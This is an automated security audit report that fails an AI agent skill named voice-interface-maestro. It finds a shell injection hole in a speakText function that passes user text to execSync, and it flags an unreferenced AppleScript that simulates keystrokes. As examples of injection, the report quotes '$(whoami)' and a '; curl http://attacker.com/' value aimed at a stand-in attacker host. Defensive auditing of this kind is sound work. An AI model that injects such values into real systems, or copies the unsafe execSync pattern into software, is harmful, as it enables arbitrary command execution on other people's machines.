voice-interface-maestro

Fail

Audited by Gen Agent Trust Hub on Mar 6, 2026

Risk Level: HIGH
COMMAND_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION]: The speakText function in src/lib.ts uses child_process.execSync to invoke the macOS say command with user-provided text. The sanitization logic in cleanTextForSpeech and the escaping mechanism in speakText are insufficient to prevent shell injection. Specifically, while it removes backticks and escapes double quotes, it fails to sanitize other shell metacharacters such as $(), ;, &, and |. An attacker providing input like $(whoami) or ; curl http://attacker.com/ could execute arbitrary commands in the context of the agent process.
  • [COMMAND_EXECUTION]: The skill includes an unreferenced AppleScript file at applescript/toggle_dictation.scpt that uses System Events to simulate keyboard input (key code). This capability, if exploited or activated, allows unauthorized UI interaction and could potentially bypass security prompts on macOS.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Mar 6, 2026, 11:28 AM